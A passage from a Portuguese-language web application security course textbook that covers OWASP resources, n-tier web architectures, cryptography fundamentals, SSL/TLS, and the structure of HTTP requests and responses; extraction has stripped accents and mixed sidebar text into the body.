membros da organizao. Por essa razo, foi adotado pelos padres PCI DSS (PCI, 2009a)
e PCI PA-DSS (PCI, 2009b) para figurar como os itens mnimos que devem ser conside-
rados na codificao segura de sistemas web.
1 Guia de desenvolvimento (Wiesmann et al., 2005): descreve as melhores prticas de

segurana para o projeto, desenvolvimento e implantao de sistemas e servios web
e inclui diversos exemplos prticos de cdigos em JEE, ASP.NET e PHP.
1 Guia de testes (Meucci et al., 2008): fornece metodologia e procedimentos detalhados para
a realizao de testes de invaso em aplicaes web, com cobertura das principais vulnera-
bilidades conhecidas. So apresentados testes caixa-preta e, tambm, caixa-cinza.
1 Guia de reviso de cdigo (Van der Stock et al., 2008): livro que ilustra como encon-
trar vulnerabilidades em aplicaes web, por meio da inspeo do cdigo-fonte.
Contm exemplos em diversas linguagens, como Java, C, C++ e ASP.
1 WebScarab: ferramenta escrita em Java, para ser utilizada em testes de segurana de

aplicaes web. A principal funcionalidade atuar como um proxy entre o navegador e
o servidor web, permitindo interceptar requisies e respostas e alter-las, se desejado.
Outras opes existentes permitem, por exemplo, automatizar testes de injeo, analisar
a aleatoriedade de identificadores de sesso e repetir requisies contidas no histrico.
5
1 WebGoat: uma aplicao web propositadamente insegura, criada com o objetivo de q
ensinar os conceitos de segurana web e testes de invaso. Parte dos exemplos deste
texto baseada nessa ferramenta.
Arquiteturas e tecnologias de aplicaes web

Nos primrdios da internet, os servidores web forneciam, basicamente, contedo q
esttico composto por documentos e imagens.
Tais recursos eram acessados pelos navegadores web, em um modelo cliente-servidor, no

qual o usurio no era capaz de fornecer nenhuma informao por meio da interface dispo-
l
Saiba mais
nibilizada. O mximo permitido consistia na navegao por documentos, contendo assuntos
relacionados, que eram referenciados por meio de hiperlinks. Claramente, no possvel Payment Card Industry
classificar tais provedores de contedo como aplicaes web e, portanto, eles no so inte- Data Security Standard
(PCI DSS) um padro
ressantes no contexto de testes de invaso abordado no presente documento. As vulnerabi- definido pelas bandei-
lidades que eram ento encontradas pertenciam apenas s plataformas subjacentes, como ras Visa, Mastercard,
American Express, JCB
o servidor web e o sistema operacional.
q
e Discover para mini-
mizar riscos envolven-
Observe que, nesse estgio inicial, os stios web eram centrados nos documentos e no
do pagamentos com
nos usurios. Diferentemente, uma aplicao web interage com as pessoas que a uti- cartes de crdito e
lizam, recebendo, devolvendo e atualizando informaes contidas nas fontes de dados dbito. O padro est
organizado em doze
da aplicao, de maneira dinmica.
requisitos principais
Um fluxo comum de processamento compreende os seguintes passos (Shklar, 2009): que cobrem segurana
de redes, proteo de
recebimento da requisio do usurio; interpretao da solicitao e subsequente enca- dados de carto arma-
minhamento; controle do acesso, por meio de autenticao e verificao dos privilgios; zenados, transmisso
acesso e atualizao de dados, de acordo com a lgica de negcio; personalizao da segura, segurana fsi-
ca e poltica de segu-
resposta, para atender aos diversos tipos de aplicaes clientes e caractersticas nicas rana, dentre outros.
dos usurios; e a transmisso da resposta para apresentao ao usurio. Payment Card Industry
Payment Application
As primeiras aplicaes web implementavam todas as etapas acima de maneira progra- Data Security Standard
mtica, utilizando tecnologias como CGI e Servlets Java. (PCI PA-DSS) um
padro mantido pelo
O grande problema que os sistemas eram monolticos, isto , as camadas de apresen- conselho PCI que tem
por objetivo auxiliar as
tao, lgica de negcios e de dados eram todas misturadas em um ou mais programas.
empresas de software
Assim, uma modificao incorreta no cdigo que construa uma tela poderia afetar uma de pagamento eletrni-
regra de manipulao de informao. Similarmente, a troca de um sistema gerenciador de co a desenvolver sis-
temas que no violem
banco de dados por outro no podia ser feita transparentemente. Outro inconveniente requisitos prescritos
que o leiaute da pgina ficava sob a responsabilidade dos programadores, que, normal- no PCI DSS e, assim,
mente, no possuam as habilidades necessrias nessa arena. no impedir estabele-
q
cimentos comerciais e
provedores de servios
Uma abordagem alternativa, visando minimizar esse problema, consiste na gerao de
a obter a certificao.
pginas HTML a partir de modelos (templates) que se baseiam em estruturas de forma-
tao e permitem uma quantidade limitada de cdigo embutido para incluso dinmica
de dados. Exemplos dessa soluo incluem o Cold Fusion, Apache Velocity e Server-Side
Includes (SSI), atuando em parceria com CGI.
Se por um lado o uso de modelos atendeu parcialmente o propsito de separar o contedo da

apresentao, por outro, pecou em limitar demasiadamente o poder e flexibilidade da abor-
dagem centrada em cdigo. Por esse motivo, solues hbridas procuraram mesclar modelos
orientados a pginas com o poder oferecido pela programao, permitindo, assim, a incluso de
blocos inteiros de cdigo permeando estruturas de formatao. Contrariando as crenas iniciais,
a fuso das vantagens de cada um dos cenrios no teve resultado positivo, uma vez que, nova-
mente, contedo e apresentao se tornaram indissociveis em um nico objeto (Shklar, 2009).
6
Solues hbridas procuraram mesclar modelos orientados a pginas com o poder q
oferecido pela programao. Active Server Pages (ASP), da Microsoft, PHP e JavaServer
Pages (JSP), da Sun, foram tecnologias que enveredaram por esse caminho.
Embora ainda hoje seja possvel encontrar sistemas desenvolvidos com todas essas
tecnologias, aplicaes web modernas, normalmente, so construdas com base em um
modelo de n-camadas. O objetivo separar totalmente a lgica de negcio das camadas
de dados e de apresentao ao usurio e obter, com isso, total flexibilidade na seleo
de tecnologias e manuteno do sistema.
Para exemplificar, imagine uma aplicao que armazena informaes em arquivos de texto
e que, por algum motivo, um sistema gerenciador de bancos de dados deva ser adotado
no lugar. Como o acesso s informaes ocorre por meio de uma interface bem definida e
abstrata da camada de dados, a alterao no impacta o cdigo que as utiliza.
Java EE (Oracle, 2010) um exemplo de plataforma para execuo de aplicaes calcada no

conceito de mltiplas camadas. A primeira delas composta por navegadores web e apli-
caes clientes que fazem interface com o usurio e se comunicam com o servidor Java EE.
A camada web responsvel pela gerao dinmica de contedo e transporte das informa-
es fornecidas pelo usurio at a camada de negcio. Ela emprega tecnologias como Ser-
vlets, JavaServer Pages, JavaServer Faces e JavaBeans. A terceira camada composta pelos
componentes que implementam a lgica de negcio da aplicao, que so construdos, por
exemplo, com Enterprise JavaBeans. Por fim, a ltima camada compreende servidores de
bancos de dados, sistemas legados e demais fontes de dados pertinentes, que so aces-
sadas por tecnologias como Java Database Connectivity API (JDBC) e Java Persistence API.
importante entender como todos esses elementos so distribudos em servidores q

e como so protegidos nas camadas de rede e de transporte. A Figura 1.3 ilustra uma
topologia cannica para implementao de um sistema em n-camadas.
O acesso de clientes a partir de redes no confiveis controlado por um firewall de borda

com capacidade adicional de inspecionar o trfego HTTP e bloquear ataques conhecidos.
Um conjunto de servidores web ou de aplicao responde pelas funcionalidades de apre-
sentao, transportando informaes do usurio para os servidores de aplicaes, respon-
sveis pela lgica de negcio, e formatando as respostas s requisies realizadas.
A ltima camada composta, normalmente, de servidores de bancos de dados e de sistemas
legados. A Figura 1.4 enumera alguns exemplares de cada um dos componentes principais.
FW+WAF
Aplicaes Camada de Camada de lgica Camada

Clientes apresentao de negcio de dados
Figura 1.3
Topologia de uma
aplicao em
n-camadas.
7
Componente Exemplos
Camada de cliente Navegadores web: Internet Explorer, Firefox e Chrome.

Aplicaes escritas em Java.
Microsoft Office.
Camada de apresentao IIS.

Apache.
Tomcat.
WebSphere.
JBoss.
Oracle GlassFish.
Oracle WebLogic.
Apache Geronimo.
Camada de negcio WebSphere.

JBoss.
Oracle GlassFish.
Oracle WebLogic.
Apache Geronimo.
Camada de dados Oracle database.

MS SQL Server.
MySQL.
Figura 1.4
Firewall de aplicao Apache ModSecurity.
Exemplos dos
Imperva SecureSphere WAF.
componentes de
Cisco ACE WAF. uma aplicao em
Barracuda WAF. n-camadas.
Requisitos de segurana
Que requisitos de segurana da informao podem ser atendidos por mecanismos criptogrficos?
Reviso de criptografia
Os primeiros vestgios de criptografia datam da poca dos egpcios, os quais utilizaram
hierglifos irregulares na representao de algumas informaes. O objetivo de tal prtica
era o de prover o sigilo da informao, que foi o nico requisito de segurana almejado pela
One-time pad
criptografia clssica e pr-moderna. Muitos dos algoritmos desenvolvidos nessas fases
Cifra simtrica de
foram utilizados na proteo de mensagens to importantes, como aquelas transmitidas fluxo cuja segurana
por governantes aos generais em batalha, mas nenhum deles foi construdo com uma forte incon-dicional, isto ,
independente-mente do
fundamentao e entendimento dos ataques possveis. Consequentemente, a maioria
poder computacional
desses mecanismos sucumbiu aos mais diversos ataques concebidos. existente hoje e no
futuro, ou de avanos
Pode-se dizer que esse perodo durou at o artigo seminal de Shannon (1949), que demons- na matemtica, no
trou a segurana incondicional do algoritmo one-time pad e introduziu o uso da matem- possvel quebr-la.
tica nessa rea de estudo.
8
A criptografia moderna, nascida desse marco, compreende um conjunto de tcnicas q
matemticas e computacionais utilizado para atender os seguintes requisitos de segu-
rana da informao: confidencialidade, integridade, irretratabilidade, autenticidade da
origem da mensagem e autenticidade de entidades.
1 Confidencialidade: requisito de segurana da informao que objetiva garantir que a

informao seja legvel somente para pessoas autorizadas.
1 Integridade: requisito de segurana da informao que objetiva garantir que a infor-

mao no seja alterada de maneira no autorizada ou desconhecida.
1 Irretratabilidade: tambm chamado de no repdio, um requisito de segurana da infor-

mao que tem por objetivo impedir que entidades neguem aes previamente realizadas.
1 Autenticidade: um requisito de segurana da informao que se desdobra em

autenticidade de entidades e autenticidade da origem da mensagem. No primeiro
caso, o objetivo corroborar a identidade de uma entidade e, no segundo, corroborar
a origem de uma informao.
Cifras
Cifras so mecanismos criptogrficos utilizados na proteo do sigilo da informao e q
so compostos de uma transformao de ciframento e outra de deciframento.
Os esquemas de ciframento podem ser classificados em simtricos e assimtricos,

dependendo da relao entre as chaves.
A primeira recebe como entradas um texto em claro e uma chave de ciframento e resulta em
um texto cifrado, que prov a confidencialidade da informao. Logo, o texto cifrado pode ser
enviado para o destinatrio por canais potencialmente inseguros, sem o risco de um atacante
interceptar o canal de comunicao e violar o sigilo da mensagem. A segunda transformao
utilizada para recuperar o texto original a partir do texto cifrado e da chave de deciframento.
Alice Beto
Chave de Chave de
ciframento deciframento
Texto em Texto em
claro Algoritmo de Texto cifrado Algoritmo de claro
ciframento deciframento
Canal
inseguro
???
Figura 1.5 $%^!,78g
Modelo geral para @%*&():A
Eva
o uso de cifras.
9
Cifras simtricas
Uma cifra dita simtrica ou de chave secreta quando fcil computacionalmente q
determinar uma chave a partir da outra e, em muitos casos prticos, as duas so
iguais. Por esse motivo, as chaves devem ser conhecidas apenas pelas partes que par-
ticipam da comunicao.
Os algoritmos dessa classe so rpidos e utilizam chaves relativamente pequenas. Um pro-

blema desses esquemas, porm, que o nmero de chaves em uma rede tende a ser grande.
Isso ocorre porque quaisquer duas entidades que queiram se comunicar de forma confiden-
cial precisam compartilhar uma chave. Em uma rede com vrias entidades, considerando-se
que todo mundo deseja comunicar-se seguramente com o restante das pessoas do grupo,
o nmero total de chaves dado pelo nmero de combinaes de n, dois a dois, isto , Cn,2.
Outro problema fundamental nesse esquema o da distribuio segura de chaves, isto ,

como duas entidades podem partilhar uma chave sem que uma terceira parte no autori-
zada tome conhecimento dela. Essa troca de chaves pode ser feita presencialmente ou por
meio de protocolos criptogrficos para estabelecimento de chaves, como o protocolo
Diffie-Hellman, por exemplo.
As cifras simtricas podem ser classificadas em cifras de blocos e cifras de fluxo. As pri-
meiras so aquelas que dividem o texto em claro em blocos de tamanho fixo e processam
um bloco por vez, com a mesma chave de ciframento. As cifras de fluxo, por sua vez, podem
ser consideradas cifras de blocos simples com tamanho unitrio, mas que podem variar a
chave de ciframento utilizada para transformar cada bloco. A sequncia de chaves utilizadas
chamada de fluxo de chaves.
Cifras assimtricas
Uma cifra chamada de assimtrica quando so utilizadas chaves diferentes para q
ciframento (chave pblica) e deciframento (chave privada), mas que so relacionadas
matematicamente. Somente a ltima precisa ser mantida em sigilo e, naturalmente,
deve ser computacionalmente infactvel recuper-la a partir da chave pblica, que pode
ser distribuda livremente.
Essas cifras so muito mais lentas que as cifras simtricas e necessitam de chaves
maiores para garantir um mesmo nvel de segurana.
Por outro lado, o nmero de chaves utilizadas bem menor: cada entidade precisa apenas de
um par de chaves e, assim, em uma rede com n entidades, haver somente n pares de chaves.
Para ilustrar um problema inerente a essa classe de cifras, imagine o seguinte cenrio: Alice
deseja enviar uma mensagem secreta para Beto. Ela ento obtm a chave pblica dele de uma
fonte qualquer (uma pgina web, um anncio de jornal etc.), utiliza-a para cifrar a mensagem
e envia o resultado a Beto. Como somente Beto possui a chave privada correspondente,
somente ele capaz de recuperar a mensagem original. Mas o que aconteceria se Eva, curiosa
por saber das mensagens alheias, tivesse fornecido sua chave pblica Alice como sendo a
de Beto? Como Eva possui a chave privada correspondente, ela capaz de obter a mensagem
original de Alice e, em seguida, cifr-la com a chave pblica de Beto, enviando-lhe o resultado.
No fim desse cenrio, Alice no saberia que sua mensagem foi revelada a outra parte que no
Beto. O ataque foi possvel porque no se verificou a autenticidade da chave pblica utilizada,
o que pode ser realizado por meio de certificados de chave pblica.
10
Funes de hash criptogrficas
Uma funo de hash criptogrfica uma funo computacionalmente eficiente que q
mapeia cadeias binrias de tamanho arbitrio para cadeias binrias de tamanho fixo
qualquer, chamadas de valores hash (Menezes et al., 2001).
Esses valores constituem uma espcie de impresso digital da cadeia mapeada e, por
isso, podem ser empregadas para verificao de integridade da informao.
Trs propriedades precisam ser satisfeitas, para que essas funes tenham utilidade
criptogrfica:
1 Resistncia da pr-imagem: para essencialmente qualquer valor hash, deve ser

computacionalmente infactvel encontrar uma entrada que seja mapeada para ele.
1 Resistncia da segunda pr-imagem: dado um elemento x qualquer e seu respec-

tivo hash, deve ser computacionalmente infactvel encontrar um elemento diferente
de x que possua o mesmo hash.
1 Resistncia a colises: deve ser computacionalmente infactvel encontrar duas

entradas quaisquer e diferentes que possuam o mesmo hash. Essa propriedade
difere da anterior, porque h liberdade na escolha das duas entradas.
Graas a essas propriedades, funes de hash criptogrficas podem ser empregadas

para diversas finalidades, como:
1 Proteo de senhas em sistemas Unix/Linux: somente os hashes das senhas so

armazenados em arquivos. Como pela resistncia da pr-imagem, infactvel recu-
MD5
perar uma senha a partir de um hash especfico, ela encontra-se protegida.
Message-Digest
algorithm 5. Funo 1 Verificao da integridade de arquivos: ao baixar arquivos grandes pela internet,
de hash criptogrfica
como as imagens de uma distribuio Linux, por exemplo, possvel verificar a integri-
criada por Ron Rivest,
em 1992, e especificada dade do que foi obtido, por meio do clculo do hash da imagem e comparao com o
na RFC-1321. Teve hash fornecido pelo site. Por conta das ltimas duas propriedades, a probabilidade de
a propriedade de
um arquivo corrompido gerar o mesmo hash da imagem ntegra praticamente nula.
resistncia a colises
quebrada em 2004, Observe-se que esse uso no impede que uma entidade maliciosa troque o arquivo de
por um grupo de imagem e tambm o arquivo contendo o hash para verificao de integridade.
pesquisadores chineses.
Desde ento, diversos Desde o ataque de Wang e Yu (2005) contra o MD5, que resultou na violao da resistncia
ataques baseados na
a colises desse algoritmo, diversas outras funes de hash criptogrficas foram quebradas
vulnerabilidade foram
descritos na literatura. e ataques significativos baseados no resultado dos pesquisadores chineses, descritos na
literatura cientfica. O mais crtico deles foi o resultado que, aproveitando-se de autoridades
RSA certificadoras que ainda assinavam os certificados com RSA+MD5, possibilitou a gerao de
Criptossistema um certificado digital vlido, com chave privada correspondente, de uma autoridade certifi-
assimtrico baseado na
cadora intermediria (Stevens et al., 2009). Tal ataque permite a emisso de certificados digi-
dificuldade de fatorao
de inteiros grandes. tais fraudulentos, mas reconhecidos como autnticos pelos navegadores web e aplicaes.
Criado por Rivest,
Shamir e Adleman, foi
MACs
q
o primeiro algoritmo
a implementar o
Message Authentication Code (MAC) um mecanismo criptogrfico simtrico que tem
conceito de criptografia
assimtrica, introduzido por objetivo prover integridade da informao e autenticidade da origem da mensagem.
por Diffie e Hellman.
Message Authentication Code (MAC) um mecanismo criptogrfico simtrico que tem por
objetivo prover integridade da informao e autenticidade da origem da mensagem. Aceita
como entradas uma mensagem e uma chave simtrica e gera como resultado um cdigo de
autenticao. Devido simetria da chave, que compartilhada entre os usurios de uma
11
comunicao, no possvel garantir a irretratabilidade, pois qualquer um deles capaz de
gerar o mesmo MAC para uma dada mensagem.
As propriedades esperadas desses algoritmos esto listadas a seguir: q

1 Facilidade de computao: dadas uma chave e uma mensagem fcil computar o
MAC correspondente.
1 Compresso: cadeias binrias de tamanho arbitrrio so mapeadas para cadeias

binrias de tamanho fixo.
1 Resistncia computao: deve ser computacionalmente infactvel computar, a

partir de um conjunto de pares (mensagem, MAC), o MAC de uma mensagem no
pertencente a esse conjunto, sem conhecimento da chave simtrica.
Dessas trs propriedades, a nica relacionada segurana a ltima. Caso ela seja que-
brada, possvel forjar o MAC para uma mensagem e pass-la por autntica.
Assinaturas digitais
A assinatura digital uma primitiva criptogrfica essencial para prover autenticao da q
origem da mensagem, integridade e irretratabilidade. Por meio desse mecanismo, uma
entidade capaz de associar a identidade dela a uma informao.
Diferentemente de assinaturas manuais, que so constantes, a assinatura digital varia de

acordo com a mensagem sendo assinada e um segredo conhecido apenas pelo signatrio.
A assinatura digital uma primitiva criptogrfica essencial para prover autenticao da

origem da mensagem, integridade e irretratabilidade. Por meio desse mecanismo, uma
entidade capaz de associar a identidade dela a uma informao. Diferentemente de assi-
naturas manuais, que so constantes, a assinatura digital varia de acordo com a mensagem
sendo assinada e um segredo conhecido apenas pelo signatrio. Se no fosse assim, seria
muito fcil falsificar assinaturas digitais, uma vez que bastaria copiar uma cadeia de bits
constante. Ainda nessa linha, um requisito importante para a efetividade do mecanismo
que deve ser computacionalmente infactvel construir uma mensagem para uma assinatura
existente, bem como gerar uma assinatura fraudulenta para uma mensagem qualquer.
Um esquema de assinaturas digitais consiste em um algoritmo de gerao e outro de verifi-

cao de assinaturas. O primeiro produz uma assinatura digital, em funo da mensagem e
chave privada do signatrio, enquanto que o segundo emprega a chave pblica e utilizado
para verificar se uma assinatura autntica, ou seja, se foi criada por uma dada entidade
sobre uma informao especfica. Embora a grande maioria desses mecanismos seja assi-
mtrica, existem alguns esquemas simtricos, mas que dependem de uma terceira parte
confivel para execuo de ambos os processos.
Os esquemas de assinaturas digitais podem ser classificados em:

1 Esquemas de assinaturas digitais com apndice: requerem a mensagem original para

o processo de verificao.
1 Esquemas de assinaturas digitais com recuperao de mensagens: o processo de verifi-

cao no requer a mensagem original, que recuperada a partir da prpria assinatura.
Certificados digitais
Existe muita confuso na literatura e entre profissionais de segurana sobre o que realmente
um certificado digital. muito comum encontrar afirmaes de que ele serve para autenticar
uma entidade, como um servidor web, por exemplo. Mas isso est longe de ser a verdade.
12
O propsito de um certificado, na realidade, atestar a autenticidade da chave pblica q
de uma entidade, condio que fundamental para o emprego de criptossistemas assi-
mtricos (Menezes et al., 2001).
Isso obtido pela confiana depositada em uma terceira parte confivel, a autoridade
certificadora (AC), que assina digitalmente um documento eletrnico contendo infor-
maes sobre uma dada entidade e a chave pblica autntica dela. Esses dados, mais
a assinatura digital, compem o certificado digital, que pode ser distribudo por canais
inseguros, sem o risco de adulterao indetectvel.
A emisso, como chamado o processo descrito, deve ocorrer apenas aps a AC, com a
diligncia devida, verificar documentos comprobatrios da identidade da entidade e que
ela tem a posse da chave privada associada. Para validar um certificado digital, neces-
srio verificar se a data atual est dentro do prazo de validade do certificado, se ele no
est revogado e se a assinatura digital da autoridade certificadora vlida (esse processo
executado recursivamente ao longo da cadeia de certificao). Essa ltima parte requer
a chave pblica autntica da AC, a qual pode ser obtida por meio de um certificado digital
emitido para ela, por uma AC de nvel superior, ou por meio de um certificado autoassinado,
caso seja uma AC raiz. Nesse ltimo caso, o certificado assinado com a prpria chave
privada associada chave pblica contida nele. Uma vez que qualquer pessoa pode gerar
um certificado assim, primordial que ele seja fornecido por um canal autntico e ntegro.
Protocolos SSL e TLS

O Secure Sockets Layer (SSL) uma pilha de protocolos desenvolvida pela Netscape, que q
atua acima da camada de transporte, provendo servios de autenticao (mtua) de
entidades, autenticao da origem da mensagem, confidencialidade e integridade.
A verso 3 do SSL foi avaliada publicamente e deu origem ao Transport Layer Security (TLS)
IETF v1.0, padronizado pelo IETF.
Internet Engineering
Task Force uma Desse modo, preenche a lacuna existente na pilha TCP/IP, com relao a um mecanismo de
organizao aberta, sem transporte seguro de informaes fim-a-fim. Os protocolos especificados pelo padro esto
um processo formal
ilustrados na Figura 1.6.
de filiao, que define
padres tecnolgicos
para a internet. SSL Handshake SSL Change SSL Alert
HTTP Telnet
Protocol Cipher Spec Protocol
SSL Record Protocol
TCP
Figura 1.6
Pilha de protocolos IP
do SSL.
O protocolo SSL Record, representado na Figura 1.7, o responsvel pelos servios de q

confidencialidade, integridade e autenticidade da origem da mensagem.
Ele utilizado pelos demais protocolos da pilha SSL e por protocolos da camada de apli-
cao, como o HTTP e o FTP, por exemplo. O dado de aplicao a ser transportado frag-
mentado em diversos blocos que so tratados individualmente. Em alguns casos, ocorre
compresso antes que o MAC seja calculado e adicionado ao final do bloco. O conjunto
cifrado com o algoritmo simtrico definido pelo handshake e, em seguida, adicionado o
13
cabealho SSL Record, que inclui a verso de SSL empregada e identificao do protocolo de
camada superior que processar o fragmento.
Dados da aplicao
Fragmentos
Compresso
Adio de MAC
Ciframento
Figura 1.7
Adio do cabealho SSL Record
SSL Record Protocol.
O prximo protocolo importante, executado no incio da conexo, o SSL Handshake (Figura 1.8),
que utilizado para autenticao do servidor (e eventualmente do cliente) e definio das
caractersticas de segurana a serem utilizadas na proteo do canal. No passo 1, o cliente
envia ao servidor as sutes criptogrficas suportadas, verso de protocolo, identificador de
sesso e um nmero gerado pseudoaleatoriamente. O servidor devolve uma mensagem
com a sute escolhida, verso do protocolo, outro nmero pseudoaleatrio e o mesmo iden-
tificador de sesso, caso o valor fornecido seja no nulo. O certificado digital do servidor
enviado no passo 2, juntamente com uma solicitao de certificado do cliente, caso a auten-
ticao mtua tenha sido configurada. Nesse caso, esse certificado fornecido no passo 3,
quando tambm so enviadas informaes para o estabelecimento de chaves.
Na ltima etapa, os algoritmos selecionados so ativados por meio do protocolo SSL Change
Cipher Spec e a mensagem finished, enviada protegida com os novos parmetros, utilizada para
verificar se o protocolo transcorreu com sucesso. Isso s possvel se cada uma das partes con-
seguir decifrar corretamente essa ltima mensagem enviada. Por fim, o SSL Alert Protocol utili-
zado para transportar mensagens de alerta entre os pares de uma sesso SSL. Cada mensagem
composta de apenas dois bytes, que indicam a severidade do alerta e a notificao especfica.
14
Cliente Servidor
clien
t_he
llo
(1)
hell o
se rver_
e
cat
certi
nge
y_e xcha
e r_ke
serv
t
ques (2)
ca te_re
certi
done
r_h ello_
s erve
Tempo
certi
cat
e
clien
t_key
_exc
hang (3)
e
certi
cat
e_ve
rify
chan
ge_c
iphe
r_sp
ec
nis
hed
(4)
ec
he r_sp
g e_cip
chan
hed
nis
Figura 1.8
SSL Handshake.
Segurana da informao
Que primitivas criptogrficas satisfazem a cada um dos requisitos de segurana da informao? Captulo 1 - Segurana em aplicaes web
Qual o propsito de um certificado digital?
15
Reviso dos protocolos HTTP e HTTPS
HyperText Transfer Protocol (HTTP) um protocolo da camada de aplicao, que opera q
como cliente-servidor e no orientado a conexo. Os recursos so identificados de
maneira nica por meio de Uniform Resource Locators (URLs). HTTP no possui nativa-
mente nenhum mecanismo para proteger os dados.
HTTPS empregado para transporte de dados sigilosos em aplicaes bancrias e de

comrcio eletrnico.
HTTP um protocolo da camada de aplicao, utilizado na distribuio de documentos de

hipertexto, os quais so a base da World Wide Web (Fielding et al., 1999). Esta foi a grande
responsvel pela popularizao da internet e a face mais conhecida da rede mundial.
No incio, os recursos acessados por meio de HTTP eram todos estticos, bem diferente dos
dias de hoje, em que o contedo gerado dinamicamente, de acordo com a interao do
usurio com o site.
O protocolo opera no estilo cliente-servidor, no qual o navegador web (cliente) realiza uma
requisio de recurso a um servidor web, que responde com o contedo solicitado, se existir.
HTTP no orientado conexo e, assim, um protocolo que no mantm estado das con-
versaes. O transporte dos dados, normalmente, realizado por meio de TCP/IP, mas isso
no um requisito; basta que o protocolo utilizado fornea entrega confivel. Apesar disso,
o HTTP no orientado conexo e, assim, um protocolo que no mantm o estado das
conversaes. Considerando como era utilizado nos primrdios, isso, de fato, no era uma
necessidade. Os recursos so identificados de maneira nica por meio de Uniform Resource
Locators (URLs), que correspondem aos endereos que usurios digitam nos navegadores
para acessarem sites especficos. Uma URL define o protocolo de acesso, o servidor do
recurso, porta utilizada, caminho no servidor at o elemento, nome do recurso e parmetros.
Note que nem todos esses itens so obrigatrios em uma requisio.
O protocolo HTTP no possui nativamente nenhum mecanismo para proteger os

dados que carrega.
Assim, informaes podem ser adulteradas, injetadas ou removidas, de maneira no autori-

zada, durante o trnsito at o cliente ou servidor. Para preencher essa lacuna, o HTTP pode
ser utilizado sobre os protocolos SSL ou TLS, que fornecem servios para autenticao de
entidades, autenticao da origem da mensagem, integridade e sigilo do canal de comu-
nicao. Esse o padro conhecido como HTTPS e empregado para transporte de dados
sigilosos em aplicaes bancrias e de comrcio eletrnico, por exemplo.
Requisio
Para acessar um recurso em um servidor, uma requisio HTTP deve ser realizada pelo q
cliente, de acordo com um formato pr-estabelecido, contendo trs sees. A primeira

consiste em uma linha descrevendo a requisio; em seguida, diversas linhas compem
os cabealhos HTTP pertinentes; a terceira seo, opcional, corresponde ao corpo da
mensagem e deve vir separada da segunda, por uma linha em branco.
Como ilustrao, considere que um usurio deseja ver o site da Escola Superior de Redes da
RNP, utilizando o navegador Firefox. A seguinte requisio feita pelo software:
GET http://esr.rnp.br:80/ HTTP/1.1

Host: esr.rnp.br
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR;
16
rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8 ( .NET CLR 3.5.30729)
Accept: text/html,application/xhtml+xml,application/
xml;q=0.9,*/*;q=0.8
Accept-Language: pt-br,pt;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
A primeira linha sempre composta por um mtodo HTTP (GET), o recurso identificado por
uma URL (http://esr.rnp...) e a verso do protocolo utilizada (HTTP/1.1). As demais linhas do
exemplo so cabealhos, que identificam, entre outras coisas, o nome de domnio do ser-
vidor, o navegador utilizado, o tipo de sistema operacional do cliente e tipos de contedos e
codificaes aceitos.
Resposta
A resposta do servidor a uma requisio, tambm, composta por trs sees: q
1 Linha de estado descrevendo o protocolo e verso utilizados, cdigo de estado e um
valor textual, que no interpretado, hoje, pelos navegadores.
1 Sequncia de cabealhos fornecendo informaes como data, servidor e tipo do contedo.

1 Contedo referente ao recurso solicitado, separado das sees anteriores, por uma
ou mais linhas em branco.
O resultado da requisio da seo anterior est ilustrado a seguir. importante mencionar

que uma resposta pode gerar novas requisies, caso o contedo apresentado possua ele-
mentos como imagens e scripts com especificao de arquivos.
HTTP/1.1 200 OK
Date: Thu, 09 Sep 2010 01:07:53 GMT
Server: Apache/2.2.12 (Ubuntu)
X-Powered-By: PHP/5.2.10-2ubuntu6.4
Set-Cookie: esr=1fa7bce201555382a9e901fff3b3a1fc1226489b; path=/;
domain=rnp.br
Set-Cookie: esr_data=yQdWXrdxCb%2BhaHkaiwD715%2F4PVrGe%2BqfoMX81a1
CksCHNB6J%2BjI%2BrffuKXrlCbCi; path=/; domain=rnp.br
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: esr_data=vsppYJJlddvBfXVW%2FPC%2FAPH7zwMPGzJTMKgMALrli
HhYkDN7bUE1ZP5KN6WkNVBhhA%2Fi3nlB6rALyd7x8qVoIqu8fINFYFqA; path=/;
domain=rnp.br
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
X-Content-Encoding: gzip
Content-length: 4965
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE html PUBLIC -//W3C//DTD XHTML 1.0 Transitional//EN

/_dtd/xhtml1-transitional.dtd><html xml:lang=pt-br lang=pt-
br><head><meta http-equiv=Content-Type content=text/html;
charset=iso-8859-1 /><title>Escola Superior de Redes</title>
...
17
Mtodos
H oito mtodos, ao todo, especificados pelo protocolo HTTP, os quais indicam a ao q
solicitada pela requisio. Os dois mais importantes, no escopo desse texto, so os
mtodos GET e POST.
O primeiro utilizado para solicitar pginas ao servidor e permite que parmetros sejam
passados como parte da URL do recurso. Isso implica que informaes sensveis no devem
ser passadas por meio de GET, pois elas sero exibidas em histricos de navegadores e
registradas em trilhas de auditoria, no servidor web. O mtodo POST empregado para
submeter aes ao servidor e os parmetros podem ser passados como parte do corpo da
mensagem e, tambm, da URL.
Cdigos de estado
Cdigos de estado so valores numricos de trs dgitos, que fazem parte da primeira q
linha da resposta do servidor a uma requisio e denotam o resultado da solicitao.
So divididos em cinco classes, de acordo com o significado:
1 1xx: cdigos de informao. Atualmente, so raramente utilizados.

1 2xx: indicam que a requisio foi atendida com sucesso. Ex.: 200 OK resposta padro,
quando o recurso provido sem erros.
1 3xx: informam que o cliente precisa realizar aes adicionais para completar a requi-
sio. Ex.: 301 Moved Permanently faz com que requisies subsequentes da URL
solicitada sejam permanentemente redirecionadas para a informada na mensagem.
1 4xx: enviadas quando a requisio no pode ser atendida, por erro de sintaxe, falta de
autorizao ou porque o recurso no foi encontrado. Ex.: 404 Not Found o recurso no
pde ser encontrado no servidor.
1 5xx: indicam erros no servidor que o impediram de atender a requisio. Ex.: 501 Not
Implemented o servidor no suporta o mtodo solicitado.
Cabealhos
Os cabealhos compem a segunda seo das requisies e respostas e definem vrias q
caractersticas importantes de ambas. So compostos pelo nome e o valor, separados
pelo sinal de dois-pontos e listados um por linha.
Os itens a seguir explicam alguns dos cabealhos encontrados nos exemplos anteriores:
1 Host: nome de domnio do servidor.

1 User-Agent: indica a aplicao cliente que gerou a requisio.
1 Accept: tipos de contedo aceitos pela aplicao cliente.

1 Server: nome do servidor e informaes do sistema operacional. Se nenhum meca-
